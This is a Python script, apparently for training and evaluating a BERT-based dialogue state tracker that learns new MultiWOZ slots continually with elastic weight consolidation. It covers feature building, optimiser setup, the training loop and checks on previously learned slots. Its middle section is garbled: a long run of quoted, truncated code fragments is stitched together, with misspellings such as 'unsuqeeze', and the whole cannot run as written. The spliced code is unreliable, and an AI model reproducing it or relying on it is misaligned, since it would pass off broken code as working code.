    # reshape tensors to [batch, turn, word]
    all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
    all_input_len = all_input_len.view(-1, max_turn_length, 2)
    all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
    all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)

    return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids


def get_label_embedding(labels, max_seq_length, tokenizer, device):
    features = []
    for label in labels:
        label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
        label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
        label_len = len(label_token_ids)
        label_token_ids += [0] * (max_seq_length - len(label_token_ids))
        assert len(label_token_ids) == max_seq_length
        features.append((label_token_ids, label_len))

    all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
    all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)
    return all_label_token_ids, all_label_len


def _truncate_seq_pair(tokens_a, tokens_b, max_length):
    """Truncates a sequence pair in place to the maximum length."""
    while True:
        total_length = len(tokens_a) + len(tokens_b)
        if total_length <= max_length:
            break
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()
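
# Illustration only: convert_examples_to_features pads every dialogue to
# max_turn_length turns and then views the flat feature list as
# [dialogue, turn, token]; padding turns carry label_id == -1 and are masked
# out downstream. Toy sizes below, never called anywhere.
def _demo_turn_reshape():
    max_turn_length, max_seq_length = 3, 4
    flat = torch.arange(2 * max_turn_length * max_seq_length)  # stand-in token ids
    all_input_ids = flat.view(-1, max_turn_length, max_seq_length)
    return all_input_ids.shape  # torch.Size([2, 3, 4])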
\\n\" \"Sequences longer than this will be truncated,", "class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0,", "% (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation", "torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len =", "for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]:", "val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val", "label_id self.prev_label_id = prev_label_id # trained slots in previous tasks class DataProcessor(object): \"\"\"Base", "dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss +=", "the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model", "= label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids,", "= processor.get_labels() # Slot value labels of Present task label_list = prev_label_list +", "BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir,", "= [{_label: i for i, _label in enumerate(labels)} for labels in label_list] for", "turn length. 
\\n\" \"Sequences longer than this will be truncated, and sequences shorter", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _", "default=3.0, type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The", "num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data =", "None all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn = 0", "= dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f", "\"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index = None examples =", "l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] +", "= input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu ==", "Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f", "best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\"", "= 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None", "plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog = [] for", "not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training", "eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy +=", "encoder trainable. \\n\" \"This option is valid only when using label embeddings. 
\\n\")", "raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the dev", "all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev,", "BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should", "will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training:", "else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total =", "_, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean()", "eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for", "text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with", "torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for key in ptr_model.keys(): if", "BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be", "for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train", "\\n\" \"This option is valid only when using label embeddings. 
\\n\") parser.add_argument(\"--distance_metric\", type=str,", "slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated:", "None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0", "Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx #", "/ nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx", "models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if", "sorting the ontology according to the alphabetic order of the slots self.ontology =", "for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of", "{'params': [p for n, p in param_optimizer if any(nd in n for nd", "= %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len,", "logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size", "label_list = prev_label_list + target_label_list # All slot value labels num_labels = [len(labels)", "processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) /", "size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev,", "* prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn", "prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0", "if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, ))", "1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx", "all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in", "* prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for", "1.0 - x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ##", "help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train", "line[3]: system response label = [ line[4+idx] for idx in self.target_slot_idx] prev_label =", "label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1)", "values are different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list", "label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"*****", "-1 or 
torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for", "= label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot,", "== 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples,", "% slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i,", "= text_a self.text_b = text_b self.label = label # Target slots in this", "longer than this will be truncated, and sequences shorter \\n\" \"than this will", "for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length", "in previous tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def", "0 for vid, value in enumerate(slot): if not value == 0: class_acc =", "args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\"", "SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot,", "in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids,", "value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\") args =", "(target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps", "num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [", "type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns", "not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler", "length. 
\\n\" \"Sequences longer than this will be truncated, and sequences shorter \\n\"", "of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true',", "EWC else: raise ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC", "prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss", "str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or", "def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x,", "acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _,", "self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return", "install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters,", "'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value in slot_idx.items(): if", "[ l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn", "self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ',", "enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for", "class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count =", "self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for", "('rnn.' 
in key): # rename rnn -> nbt, rename_list.append(key) for key in del_list:", "bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output", "else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting", "tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids,", "len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)", "','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples,", "label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss,", "ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]),", "accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len,", "enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length", "[x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b,", "to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no further", "max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for", "processor.get_prev_labels() # Slot value labels of Previous task target_label_list = processor.get_labels() # Slot", "\\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if", "data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len", "\" # \" + text_b else: text_a = line[2] # line[2]: user utterance", "(ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length =", "## Get slot-type embeddings ## Note: slot embeddings are ordered as [previous slots", "loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() *", "#if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len)", "type=float, help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, 
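
    # Illustration only (never called): the BERT-style schedule used at each
    # optimizer step later in this function multiplies the base learning rate
    # by warmup_linear; a short trace of its values for warmup=0.1.
    def _demo_warmup_schedule():
        # x=0.0 -> 0.0, 0.05 -> 0.5, 0.1 -> 0.9, 0.5 -> 0.5, 1.0 -> 0.0
        return [round(warmup_linear(x, warmup=0.1), 3)
                for x in (0.0, 0.05, 0.1, 0.5, 1.0)]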
    ###########################################################################
    # Build the models
    ###########################################################################

    # Prepare model
    if args.nbt == 'rnn':
        from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
        if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
            raise ValueError("Task name should include at least \"gru\" or \"lstm\"")
    elif args.nbt == 'turn':
        from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker
    elif args.nbt == 'transformer':
        from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
    else:
        raise ValueError('nbt type should be either rnn or transformer')
    from BeliefTrackerSlotQueryMultiSlotEWC import EWC

    model = BeliefTracker(args, num_labels, device)
    if args.fp16:
        model.half()

    # Load pretrained model,
    # in the case that slots and values are different between training and evaluation
    if args.load_path:
        ptr_model = torch.load(args.load_path, map_location=device)
        del_list = []
        rename_list = []
        for key in ptr_model.keys():
            if ('slot_lookup' in key) or ('value_lookup' in key):  # remove slot_lookup and value_lookup
                del_list.append(key)
            if 'rnn.' in key:  # rename rnn -> nbt
                rename_list.append(key)
        for key in del_list:
            del ptr_model[key]
        for key in rename_list:
            new_key = key.replace('rnn.', 'nbt.')
            ptr_model[new_key] = ptr_model[key]
            del ptr_model[key]
        state = model.state_dict()
        state.update(ptr_model)
        model.load_state_dict(state)

    model.to(device)

    ## Get slot-value embeddings
    label_token_ids, label_len = [], []
    for labels in label_list:
        token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
        label_token_ids.append(token_ids)
        label_len.append(lens)

    ## Get slot-type embeddings
    ## Note: slot embeddings are ordered as [previous slots + present target slots]
    slot_token_ids, slot_len = \
        get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)

    model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)

    if args.local_rank != -1:
        try:
            from apex.parallel import DistributedDataParallel as DDP
        except ImportError:
            raise ImportError(
                "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
        model = DDP(model)
    elif n_gpu > 1:
        model = torch.nn.DataParallel(model)

    # Prepare optimizer
    if args.do_train:
        def get_optimizer_grouped_parameters(model):
            param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
            no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
            optimizer_grouped_parameters = [
                {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
                 'weight_decay': 0.01},
                {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
                 'weight_decay': 0.0},
            ]
            return optimizer_grouped_parameters

        if n_gpu == 1:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
        else:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)

        t_total = num_train_steps
        if args.local_rank != -1:
            t_total = t_total // torch.distributed.get_world_size()

        if args.fp16:
            try:
                from apex.optimizers import FP16_Optimizer
                from apex.optimizers import FusedAdam
            except ImportError:
                raise ImportError(
                    "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
            optimizer = FusedAdam(optimizer_grouped_parameters,
                                  lr=args.learning_rate,
                                  bias_correction=False,
                                  max_grad_norm=1.0)
            if args.loss_scale == 0:
                optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
            else:
                optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
        else:
            optimizer = BertAdam(optimizer_grouped_parameters,
                                 lr=args.learning_rate,
                                 warmup=args.warmup_proportion,
                                 t_total=t_total)
        logger.info(optimizer)

    ###########################################################################
    # Training code
    ###########################################################################

    if args.do_train:
        logger.info("Training...")

        global_step = 0
        last_update = None
        best_loss = None
        best_acc = None

        # EWC helper for the previously trained slots (constructor arguments elided)
        ewc = EWC(...)

        for epoch in trange(int(args.num_train_epochs), desc="Epoch"):
            #### TRAIN
            model.train()
            tr_loss = 0
            nb_tr_examples, nb_tr_steps = 0, 0

            for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch

                if n_gpu == 1:
                    loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                               target_slot=target_slot_id)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc
                else:
                    loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                       target_slot=target_slot_id)
                    loss_ = loss_.mean()
                    acc = acc.mean()
                    acc_slot = acc_slot.mean(0)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc

                if args.gradient_accumulation_steps > 1:
                    loss = loss / args.gradient_accumulation_steps

                if args.fp16:
                    optimizer.backward(loss)
                else:
                    loss.backward()

                if summary_writer is not None:
                    summary_writer.add_scalar("Epoch", epoch, global_step)
                    summary_writer.add_scalar("Train/Loss", loss_, global_step)
                    summary_writer.add_scalar("Train/Loss_EWC", loss_ewc, global_step)
                    summary_writer.add_scalar("Train/Loss_Total", loss, global_step)
                    summary_writer.add_scalar("Train/JointAcc", acc, global_step)
                    if n_gpu == 1:
                        for i, slot in enumerate(processor.target_slot):
                            summary_writer.add_scalar("Train/Loss_%s" % slot.replace(' ', '_'),
                                                      loss_slot[i], global_step)
                            summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ', '_'),
                                                      acc_slot[i], global_step)

                tr_loss += loss.item()
                nb_tr_examples += input_ids.size(0)
                nb_tr_steps += 1

                if (step + 1) % args.gradient_accumulation_steps == 0:
                    # modify learning rate with special warm up BERT uses
                    lr_this_step = args.learning_rate * warmup_linear(global_step / t_total,
                                                                      args.warmup_proportion)
                    if summary_writer is not None:
                        summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr_this_step
                    optimizer.step()
                    optimizer.zero_grad()
                    global_step += 1

            #### VALIDATION
            # Validation covers both the present target slots and the previously
            # trained slots, so forgetting can be monitored per epoch.
            model.eval()
            dev_loss, dev_acc = 0, 0
            dev_loss_slot, dev_acc_slot = None, None
            nb_dev_examples, nb_dev_steps = 0, 0
            prev_dev_loss, prev_dev_acc = 0, 0
            prev_dev_loss_slot, prev_dev_acc_slot = None, None
            prev_nb_dev_examples = 0

            for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                with torch.no_grad():
                    if n_gpu == 1:
                        loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                                   target_slot=target_slot_id)
                        loss = loss_ + args.lambda_ewc * ewc.penalty(model)
                        prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = \
                            model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                    else:
                        loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                           target_slot=target_slot_id)
                        prev_loss, _, prev_acc, prev_acc_slot, _ = \
                            model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                        loss_ = loss_.mean()
                        acc = acc.mean()
                        acc_slot = acc_slot.mean(0)
                        loss = loss_ + args.lambda_ewc * ewc.penalty(model)
                        prev_loss = prev_loss.mean()
                        prev_acc = prev_acc.mean()
                        prev_acc_slot = prev_acc_slot.mean(0)

                num_valid_turn = torch.sum(label_ids[:, :, 0].view(-1) > -1, 0).item()
                dev_loss += loss.item() * num_valid_turn
                dev_acc += acc.item() * num_valid_turn

                prev_num_valid_turn = torch.sum(prev_label_ids[:, :, 0].view(-1) > -1, 0).item()
                prev_dev_loss += prev_loss.item() * prev_num_valid_turn
                prev_dev_acc += prev_acc.item() * prev_num_valid_turn

                if n_gpu == 1:
                    if dev_loss_slot is None:
                        dev_loss_slot = [l * num_valid_turn for l in loss_slot]
                        dev_acc_slot = acc_slot * num_valid_turn
                        prev_dev_loss_slot = [l * prev_num_valid_turn for l in prev_loss_slot]
                        prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
                    else:
                        for i, l in enumerate(loss_slot):
                            dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
                        dev_acc_slot += acc_slot * num_valid_turn
                        for i, l in enumerate(prev_loss_slot):
                            prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
                        prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn

                nb_dev_examples += num_valid_turn
                prev_nb_dev_examples += prev_num_valid_turn

            dev_loss = dev_loss / nb_dev_examples
            dev_acc = dev_acc / nb_dev_examples
            prev_dev_loss = prev_dev_loss / prev_nb_dev_examples
            prev_dev_acc = prev_dev_acc / prev_nb_dev_examples
            if n_gpu == 1:
                dev_acc_slot = dev_acc_slot / nb_dev_examples
                prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples

            if summary_writer is not None:
                summary_writer.add_scalar("Validate/Loss", dev_loss, global_step)
                summary_writer.add_scalar("Validate/Acc", dev_acc, global_step)
                summary_writer.add_scalar("Validate/Prev_Loss", prev_dev_loss, global_step)
                summary_writer.add_scalar("Validate/Prev_Acc", prev_dev_acc, global_step)
                if n_gpu == 1:
                    for i, slot in enumerate(processor.target_slot):
                        summary_writer.add_scalar("Validate/Loss_%s" % slot.replace(' ', '_'),
                                                  dev_loss_slot[i] / nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Acc_%s" % slot.replace(' ', '_'),
                                                  dev_acc_slot[i], global_step)
                    for i, slot in enumerate(processor.prev_slot):
                        summary_writer.add_scalar("Validate/Prev_Loss_%s" % slot.replace(' ', '_'),
                                                  prev_dev_loss_slot[i] / prev_nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Prev_Acc_%s" % slot.replace(' ', '_'),
                                                  prev_dev_acc_slot[i], global_step)

            logger.info("*** Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, "
                        "Valid prev loss=%.6f, Valid prev acc=%.6f ***"
                        % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))

            dev_loss = round(dev_loss, 6)
            if last_update is None or dev_loss < best_loss:
                # Save a trained model
                output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
                if n_gpu == 1:
                    torch.save(model.state_dict(), output_model_file)
                else:
                    torch.save(model.module.state_dict(), output_model_file)

                last_update = epoch
                best_loss = dev_loss
                best_acc = dev_acc
                logger.info("*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***"
                            % (last_update, best_loss, best_acc))
            else:
                logger.info("*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***"
                            % (epoch, dev_loss, dev_acc))

            # if epoch > 100 and last_update + args.patience <= epoch:
            if last_update + args.patience <= epoch:
                break
    ###########################################################################
    # Evaluation
    ###########################################################################

    # Test
    output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")

    # Load a trained model that you have fine-tuned; keep the current
    # slot/value lookups, which may differ between training and evaluation.
    ptr_model = torch.load(output_model_file, map_location=device)
    del_list = []
    for key in ptr_model.keys():
        if ('slot' in key) or ('value' in key):
            del_list.append(key)
    for key in del_list:
        del ptr_model[key]

    if n_gpu > 1:
        model = model.module
    state = model.state_dict()
    state.update(ptr_model)
    model.load_state_dict(state)
    model.to(device)

    if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
        eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
            eval_examples, target_label_list, prev_label_list,
            args.max_seq_length, tokenizer, args.max_turn_length)
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = \
            all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)

